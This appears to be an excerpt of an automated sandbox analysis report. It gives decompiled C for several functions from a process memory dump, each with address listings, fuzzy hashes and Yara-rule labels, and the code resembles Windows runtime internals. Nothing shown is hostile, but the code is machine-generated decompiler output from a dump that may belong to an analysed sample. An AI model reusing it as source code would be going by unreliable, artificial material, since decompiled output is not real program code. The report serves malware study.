						 *0x349b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E033EB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E033C2280(_t28, 0x3498608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E033BFFB0(_t42, _t53, 0x3498608);
							if(_t53 != 0) {
								L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E033BFFB0(_t41, _t51, 0x3498608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                          0x033e4a2c
                                          0x033e4a34
                                          0x033e4a3c
                                          0x033e4a3e
                                          0x033e4a48
                                          0x033e4a4b
                                          0x033e4a4d
                                          0x033e4a51
                                          0x033e4a9c
                                          0x00000000
                                          0x00000000
                                          0x033e4aa3
                                          0x033e4aa8
                                          0x033e4aad
                                          0x033e4ab1
                                          0x033e4ade
                                          0x033e4ae3
                                          0x033e4a5a
                                          0x033e4a62
                                          0x033e4a6a
                                          0x033e4a6e
                                          0x0341f203
                                          0x033e4a84
                                          0x033e4a88
                                          0x033e4a89
                                          0x033e4a8a
                                          0x033e4a95
                                          0x033e4a95
                                          0x033e4a79
                                          0x033e4a80
                                          0x033e4af2
                                          0x033e4af4
                                          0x033e4af9
                                          0x033e4aff
                                          0x033e4b01
                                          0x033e4b03
                                          0x033e4b08
                                          0x0341f20a
                                          0x0341f212
                                          0x0341f216
                                          0x0341f216
                                          0x033e4b08
                                          0x033e4b13
                                          0x033e4b1a
                                          0x0341f229
                                          0x0341f229
                                          0x033e4b1a
                                          0x033e4a82
                                          0x00000000
                                          0x033e4a82
                                          0x033e4ab7
                                          0x033e4acd
                                          0x033e4acd
                                          0x033e4ad5
                                          0x033e4ada
                                          0x00000000
                                          0x033e4ada
                                          0x033e4ac2
                                          0x033e4acb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033e4acb
                                          0x033e4a53
                                          0x033e4a53
                                          0x033e4a58
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 934f47bdfdbe399681fe27e4c9662ec337736bb8158e9df42b8caa1a38f3c59e
                                          • Instruction ID: 8941976c16aaac48be4e4d1a73d967c2cd320f9efda7457a9a96c956b23cec2c
                                          • Opcode Fuzzy Hash: 934f47bdfdbe399681fe27e4c9662ec337736bb8158e9df42b8caa1a38f3c59e
                                          • Instruction Fuzzy Hash: 92312332605764DFCB21DF1ACDC5B2AFBA8FB89620F05055AE8624F691CB70DC00CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E8EC7, Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E033E8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x349d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E033D4E70(0x34986e4, 0x33e9490, 0, 0);
					if( *0x34953e8 > 5 && E033E8F33(0x34953e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x34953e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x34953e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x338bc46;
						_t48 = E03427B9C(0x34953e8, 0x338bc46, _t67, 0x34953e8, _t70,  &_v140);
					}
				}
				return E033EB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                          0x033e8ec7
                                          0x033e8ed9
                                          0x033e8edc
                                          0x033e8ee6
                                          0x033e8ee9
                                          0x033e8eee
                                          0x033e8efc
                                          0x033e8f08
                                          0x03421349
                                          0x03421353
                                          0x0342135d
                                          0x03421366
                                          0x0342136f
                                          0x03421375
                                          0x0342137c
                                          0x03421385
                                          0x03421390
                                          0x03421391
                                          0x0342139c
                                          0x0342139d
                                          0x034213a6
                                          0x034213ac
                                          0x034213b2
                                          0x034213b5
                                          0x034213bc
                                          0x034213bf
                                          0x034213c2
                                          0x034213c5
                                          0x034213c8
                                          0x034213cb
                                          0x034213ce
                                          0x034213d1
                                          0x034213d4
                                          0x034213d7
                                          0x034213da
                                          0x034213dd
                                          0x034213e0
                                          0x034213e3
                                          0x034213e6
                                          0x034213e9
                                          0x034213f6
                                          0x03421400
                                          0x03421400
                                          0x033e8f08
                                          0x033e8f32

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9061251f4e77b5c988a5518447521cf5905751179e6ca5c7ecac265aff28410f
                                          • Instruction ID: 59c5621590a254f41db251e156a8ff07c6e88780d021250fc3dd3518c91dab34
                                          • Opcode Fuzzy Hash: 9061251f4e77b5c988a5518447521cf5905751179e6ca5c7ecac265aff28410f
                                          • Instruction Fuzzy Hash: 9A419FB5D003289FDB20CFAAD981AADFBF8BB48710F5041AFE509AB241D7705A85CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DE730, Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E033DE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E033E9670() < 0) {
					L033FDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3497b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L033C4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M033DE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                          0x033de730
                                          0x033de736
                                          0x033de738
                                          0x033de73d
                                          0x033de73e
                                          0x033de740
                                          0x033de749
                                          0x033de765
                                          0x033de76a
                                          0x033de76b
                                          0x033de76c
                                          0x033de76d
                                          0x033de76e
                                          0x033de76f
                                          0x033de775
                                          0x033de777
                                          0x033de77e
                                          0x0341b675
                                          0x033de784
                                          0x033de784
                                          0x033de789
                                          0x033de7a8
                                          0x033de7ac
                                          0x033de807
                                          0x033de7ae
                                          0x033de7ae
                                          0x033de7b1
                                          0x033de7b4
                                          0x033de7b9
                                          0x033de7c0
                                          0x033de7c4
                                          0x033de7ca
                                          0x033de7cc
                                          0x00000000
                                          0x033de7d3
                                          0x033de7d6
                                          0x00000000
                                          0x00000000
                                          0x033de7ff
                                          0x033de802
                                          0x00000000
                                          0x00000000
                                          0x033de7f9
                                          0x033de7fc
                                          0x00000000
                                          0x00000000
                                          0x033de7f3
                                          0x033de7f6
                                          0x00000000
                                          0x00000000
                                          0x033de7ed
                                          0x033de7f0
                                          0x00000000
                                          0x00000000
                                          0x033de7e7
                                          0x033de7ea
                                          0x00000000
                                          0x00000000
                                          0x0341b685
                                          0x0341b688
                                          0x00000000
                                          0x00000000
                                          0x0341b682
                                          0x00000000
                                          0x00000000
                                          0x033de7cc
                                          0x033de7d9
                                          0x033de7dc
                                          0x033de7de
                                          0x033de7de
                                          0x033de7ac
                                          0x033de7e4
                                          0x033de74b
                                          0x033de751
                                          0x033de759
                                          0x033de761
                                          0x033de761

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e1fba75054a9cc11ced15da9b3ab024e329c8d05a5eae1fdd609260b74bd093
                                          • Instruction ID: c7d43c6fa6f12a0fb4078870953c6b63ad45b0acd3d9b67816671dbaf9d3abb5
                                          • Opcode Fuzzy Hash: 5e1fba75054a9cc11ced15da9b3ab024e329c8d05a5eae1fdd609260b74bd093
                                          • Instruction Fuzzy Hash: 2F315C76A14249EFD744CF58D881B9ABBE8FB09714F14826AF908CB741D631E990CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DBC2C, Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E033DBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3496100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E033C2280(0xd, 0x106ef1a0);
				_t41 =  *0x34960f8; // 0x0
				if(_t41 != 0) {
					 *0x34960f8 =  *_t41;
					 *0x34960fc =  *0x34960fc + 0xffff;
				}
				E033BFFB0(_t41, 0x800, 0x106ef1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x34960f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L033C4620(0x3496100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3496100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                          0x033dbc36
                                          0x033dbc42
                                          0x033dbc45
                                          0x033dbc4a
                                          0x033dbd35
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033dbc50
                                          0x033dbc50
                                          0x033dbc58
                                          0x033dbc5a
                                          0x033dbc60
                                          0x00000000
                                          0x00000000
                                          0x0341a4f2
                                          0x0341a4f6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0341a4fc
                                          0x033dbc79
                                          0x033dbc7e
                                          0x033dbc86
                                          0x033dbd16
                                          0x033dbd20
                                          0x033dbd20
                                          0x033dbc8d
                                          0x033dbc94
                                          0x033dbcbd
                                          0x033dbcca
                                          0x033dbccb
                                          0x033dbccc
                                          0x033dbccd
                                          0x033dbcce
                                          0x033dbcd4
                                          0x033dbcea
                                          0x033dbcee
                                          0x033dbcf2
                                          0x033dbd00
                                          0x033dbd04
                                          0x00000000
                                          0x033dbc96
                                          0x033dbcab
                                          0x033dbcaf
                                          0x033dbd2c
                                          0x033dbd2c
                                          0x033dbd09
                                          0x00000000
                                          0x033dbd09
                                          0x033dbcb1
                                          0x033dbcb5
                                          0x033dbcbb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033dbcbb

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70ab63f967826fc3f3123956ee03c6a3be5fc47eb7a8585a6d3f9d39d90aad93
                                          • Instruction ID: 74b36b8e453c2947af8edb505326aa87817ecb4885d9e7b47dba463760702d65
                                          • Opcode Fuzzy Hash: 70ab63f967826fc3f3123956ee03c6a3be5fc47eb7a8585a6d3f9d39d90aad93
                                          • Instruction Fuzzy Hash: 4E31C136A106559BCB11EF58E8C17A6B3B8FB18321F07417AED44EF209EB78D9058B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033A9100, Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E033A9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x347f6e8);
				E033FD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E034788F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E033FD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x34986c0; // 0x2f407b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x34986b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E033C2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E034788F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E033EAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x349b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x34984c0;
										if(_t69 >=  *0x34984c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03479063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E033A922A(_t82);
							_t53 = E033C7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03478B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x34986c0; // 0x2f407b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x34986b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x34986bc;
										_t72 = 0x34986b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E033A9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x34986c4;
									_t72 = 0x34986c0;
									L18:
									E033D9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                          0x033a9100
                                          0x033a9100
                                          0x033a9100
                                          0x033a9100
                                          0x033a9102
                                          0x033a9107
                                          0x033a910c
                                          0x033a9110
                                          0x033a9115
                                          0x033a9136
                                          0x033a9143
                                          0x034037e4
                                          0x034037e4
                                          0x033a9149
                                          0x033a914e
                                          0x033a914e
                                          0x033a9117
                                          0x033a911d
                                          0x00000000
                                          0x00000000
                                          0x033a911f
                                          0x033a9125
                                          0x00000000
                                          0x033a9151
                                          0x033a9158
                                          0x033a915d
                                          0x033a9161
                                          0x033a9168
                                          0x03403715
                                          0x00000000
                                          0x033a916e
                                          0x033a916e
                                          0x033a9175
                                          0x033a9177
                                          0x033a917e
                                          0x033a917f
                                          0x033a9182
                                          0x033a9182
                                          0x033a9187
                                          0x033a9187
                                          0x033a918a
                                          0x033a918d
                                          0x033a918f
                                          0x033a9192
                                          0x033a9195
                                          0x033a9198
                                          0x033a9198
                                          0x033a9198
                                          0x033a919a
                                          0x00000000
                                          0x00000000
                                          0x0340371f
                                          0x03403721
                                          0x03403727
                                          0x0340372f
                                          0x03403733
                                          0x03403735
                                          0x03403738
                                          0x0340373b
                                          0x0340373d
                                          0x03403740
                                          0x00000000
                                          0x00000000
                                          0x03403746
                                          0x03403749
                                          0x00000000
                                          0x00000000
                                          0x0340374f
                                          0x03403751
                                          0x00000000
                                          0x00000000
                                          0x03403757
                                          0x03403759
                                          0x0340375c
                                          0x0340375c
                                          0x0340375e
                                          0x0340375e
                                          0x03403761
                                          0x03403764
                                          0x00000000
                                          0x00000000
                                          0x03403766
                                          0x03403768
                                          0x034037a3
                                          0x034037a3
                                          0x034037a5
                                          0x034037a7
                                          0x034037ad
                                          0x034037b0
                                          0x034037b2
                                          0x034037bc
                                          0x034037c2
                                          0x034037c2
                                          0x034037b2
                                          0x033a9187
                                          0x033a9187
                                          0x033a918a
                                          0x033a918d
                                          0x033a918f
                                          0x033a9192
                                          0x033a9195
                                          0x00000000
                                          0x033a9195
                                          0x00000000
                                          0x033a9187
                                          0x0340376a
                                          0x0340376a
                                          0x0340376c
                                          0x0340376c
                                          0x0340376f
                                          0x03403775
                                          0x00000000
                                          0x00000000
                                          0x03403777
                                          0x03403779
                                          0x00000000
                                          0x00000000
                                          0x03403782
                                          0x03403787
                                          0x03403789
                                          0x03403790
                                          0x03403790
                                          0x0340378b
                                          0x0340378b
                                          0x0340378b
                                          0x03403792
                                          0x03403795
                                          0x03403795
                                          0x03403798
                                          0x03403798
                                          0x0340379b
                                          0x0340379b
                                          0x033a91a3
                                          0x033a91a9
                                          0x033a91b0
                                          0x033a91b4
                                          0x033a91b4
                                          0x033a91bb
                                          0x033a91c0
                                          0x033a91c5
                                          0x033a91c7
                                          0x034037da
                                          0x033a91cd
                                          0x033a91cd
                                          0x033a91cd
                                          0x033a91d2
                                          0x033a91d5
                                          0x033a9239
                                          0x033a9239
                                          0x033a91d7
                                          0x033a91db
                                          0x033a91e1
                                          0x033a91e7
                                          0x033a91fd
                                          0x033a9203
                                          0x033a921e
                                          0x033a9223
                                          0x00000000
                                          0x033a9223
                                          0x033a9205
                                          0x033a9208
                                          0x033a920c
                                          0x033a9214
                                          0x033a9214
                                          0x033a91e9
                                          0x033a91e9
                                          0x033a91ee
                                          0x033a91f3
                                          0x033a91f3
                                          0x033a91f3
                                          0x033a91e7
                                          0x00000000
                                          0x033a91db
                                          0x033a9187
                                          0x033a9168

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71ef4830eb26a736720702793461cd7983323da920392bd7a381c8debad3912b
                                          • Instruction ID: 91bda3a86ee1a102942a148e29f7e773d25e6069565bf3f686ead54f388a2e10
                                          • Opcode Fuzzy Hash: 71ef4830eb26a736720702793461cd7983323da920392bd7a381c8debad3912b
                                          • Instruction Fuzzy Hash: CC319C79A00A89DFDB25DB6CC8C8BADBBF5FB89310F18819AC4057F251C334A980CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D1DB5, Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E033D1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E033CF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L033C4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E033CF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                          0x033d1dc2
                                          0x033d1dc5
                                          0x033d1dc7
                                          0x033d1dcc
                                          0x033d1dce
                                          0x033d1dd6
                                          0x033d1ddf
                                          0x033d1de0
                                          0x033d1de1
                                          0x033d1de5
                                          0x033d1de8
                                          0x033d1def
                                          0x033d1df0
                                          0x033d1df6
                                          0x033d1df7
                                          0x033d1dfe
                                          0x033d1e1a
                                          0x00000000
                                          0x00000000
                                          0x033d1e0b
                                          0x033d1e12
                                          0x033d1e12
                                          0x033d1e00
                                          0x033d1e00
                                          0x033d1e05
                                          0x033d1e1e
                                          0x033d1e23
                                          0x0341570f
                                          0x03415713
                                          0x00000000
                                          0x00000000
                                          0x03415719
                                          0x03415719
                                          0x033d1e2c
                                          0x033d1e2d
                                          0x033d1e2e
                                          0x033d1e2f
                                          0x033d1e31
                                          0x033d1e32
                                          0x033d1e35
                                          0x033d1e3d
                                          0x03415723
                                          0x0341573d
                                          0x0341573d
                                          0x00000000
                                          0x03415723
                                          0x033d1e49
                                          0x033d1e4e
                                          0x033d1e4e
                                          0x033d1e09
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction ID: 2f787281fc0abe17ea53f55c29a0bd9753a3f0327cd0bf4e24b5bbbbc5343d28
                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction Fuzzy Hash: 41219076A00219FFD761CF99DCC0EABFBBDEF85640F154059E9059B220D634AE51CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033C0050, Relevance: .1, Instructions: 81COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E033C0050(void* __ecx) {
